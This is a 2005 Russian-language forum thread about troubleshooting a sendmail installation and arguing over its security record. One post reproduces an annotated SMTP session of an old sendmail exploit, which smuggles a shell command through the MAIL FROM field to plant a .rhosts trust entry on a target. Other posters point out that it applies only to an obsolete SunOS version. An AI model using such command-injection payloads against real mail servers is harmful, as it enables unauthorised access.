Страница 1 из 3
sendmail
Добавлено: 22 ноя 2005, 14:45
Владимир
После установки sendmail и при отправке тестового письма в maillog выдало такой лог
Nov 22 14:21:08 mail2 sendmail[523]: jAMCL8vV000523: from=vovka, size=44, class=0, nrcpts=1, msgid=<
200511221221.jAMCL8vV000523@mail2.gloria.com.ua>, relay=root@localhost
Nov 22 14:21:08 mail2 sendmail[523]: jAMCL8vV000523: to=
kovrov_v@ukr.net, ctladdr=vovka (1001/1001), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30044, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Где-то ошибся с настройками?
Добавлено: 22 ноя 2005, 14:58
Llama
Владимир, гм... я бы не рекомендовал связываться с sendmail - ИМХО излишне сложная и гибкая система. Поставьте exim + vexim.
exim.org
http://silverwraith.com/vexim/
Про установку exim и всех остальных компонент можно почитать в документации vexim
Добавлено: 22 ноя 2005, 15:13
Владимир
Спасибо за совет, но вот необходимость заставила поставить sendmail.
Так не подскажете причину такиого лога?
Добавлено: 22 ноя 2005, 17:09
Andrei (admin)
/etc/init.d/sendmail start
telnet 127.0.0.1 25
Добавлено: 22 ноя 2005, 17:38
Pilot
Sendmail это потенциальный баг в сервере
Сколько таких порутал уже
Добавлено: 22 ноя 2005, 18:11
Llama
Pilot, а теперь обоснуйте свою точку зрения пожалуйста...
Why is Sendmail included, it is "known insecure"?!
Sendmail has had an imperfect security record, however the Sendmail authors and maintainers have been very receptive to reworking their code to make it much more secure (and this is a sadly uncommon response). The recent security history of Sendmail is not much different than some of the supposedly "more secure" alternatives.
http://www.openbsd.org/faq/faq1.html#HowAbout
Надеюсь, никто не станет обвинять авторов openbsd в недостатке паранои?
Добавлено: 22 ноя 2005, 18:13
Samotnik
Товарищ, Pilot, не затруднит ли вас назвать как давно и какие версии сендмейла вы "порутали"?
Добавлено: 22 ноя 2005, 22:18
Pilot
давно было, но прокатило, правда не совсем по инструкции..
PS ЭТОТ РАЗУМЕЕТСЯ НЕ Я ЛОМАЛ
$ telnet target.remote.com 25
Connecting to 123.456.654.321.
! соединяемся по порту 25 - это SMTP
220 sendmail SMI/4.3.5.2 ready
! версия, которая как известно, содержит ошибку.
helo xxx
220 Helo xxx, ( crack.edu )
mail from: |echo crack.edu/.
rhosts@target.remote.com
! подставляем команду вместо обратного адреса.
200 Sender ok.
rcpt to: nosuchuser
! вводим заранее неправильного адресата
500 nosuchuser: user unknown
! несмотря на сообщение, продолжаем диалог.
data
230 Enter mail, end with .
200 Mail accepted
! все, машина взломана....
quit
Добавлено: 22 ноя 2005, 22:35
Pilot
...Меня в 10-ой слаке поломали, незнаю как, но через sendmail
Добавлено: 23 ноя 2005, 13:31
Samotnik
Прошу прощения, но насколько я знаю sendmail SMI версии 4.3.5.2 это что-то от Сан ОС 4. Вряд ли таким образом вы сломаете sendmail версии 8.13.х под Linux-ом.
Да Сендмейл был ужасно дырявый, но это было давно. Не думаю, что сейчас вы сломаете сендмейл идущий в дистрибе. Nем более что никто не отменял секюрити апдейты.
По поводу слаквари: Последний секюрити апдейт на сендмейл в этом дистрибе датируется 2003-09-17. Это слакваря 8.х - 9.0 Вот ссылка:
http://secunia.com/advisories/9763/
Больше ни в 2004 ни в 2005 годах я не нашёл репортов или апдейтов:
http://www.slackware.com/security/list. ... ity&y=2003
http://www.slackware.com/security/list. ... ity&y=2004
http://www.slackware.com/security/list. ... ity&y=2005
Добавлено: 23 ноя 2005, 14:05
mend0za
настораживают слова "поломали не знаю как но через sendmail"
похоже на самовнушение вызванное репутацией sendmail седых годов.
Добавлено: 23 ноя 2005, 14:54
Владимир
Извините, конечно, что вклиниваюсь, но у меня вопрос:
Как можно проверить правильно ли работает сендмаил и qpopper?
Спасибо.
Добавлено: 23 ноя 2005, 15:07
Samotnik
Владимир, по поводу первого сообщения: У меня такое чувство, что либо ваш сендмейл не может найти МХ запись для домена ukr.net (письмо вроде туду уходит) Либо у вас запрещено релеить сообщения, которые приходят с локалхоста.
По поводу последнего поста:
http://www.unix.org.ua/orelly/networkin ... h10_08.htm
Добавлено: 23 ноя 2005, 15:33
Владимир
Поясню. Есть один сервер, в работе который, на не стоит линукс, сквид и сендмаил.
Есть второй сервер-тестовый, на нем стоит фрибсд, сквид и сендмаил.
Так вот, я настраиваю сейчас второй сервер, тестовый. Они в одной сети.
Так вот, после всех проб и ошибок, письма на внешние адреса стали вроде уходить (правда возвращаются), но вот если отправить письмо в свой же офис, но в логах всегда user unknow
И еще, я не могу настроить почтовый клиент на этот тестовый сервер.
Пишит, что ненайден pop и smtp сервера. Отсюда вопрос о проверке работы qpopper.
Добавлено: 23 ноя 2005, 16:34
Samotnik
Владимир, клиента почтового вы откуда на тестовый сервер пускаете?
Вывод netstat -lnp с тестового сервака в студию!!!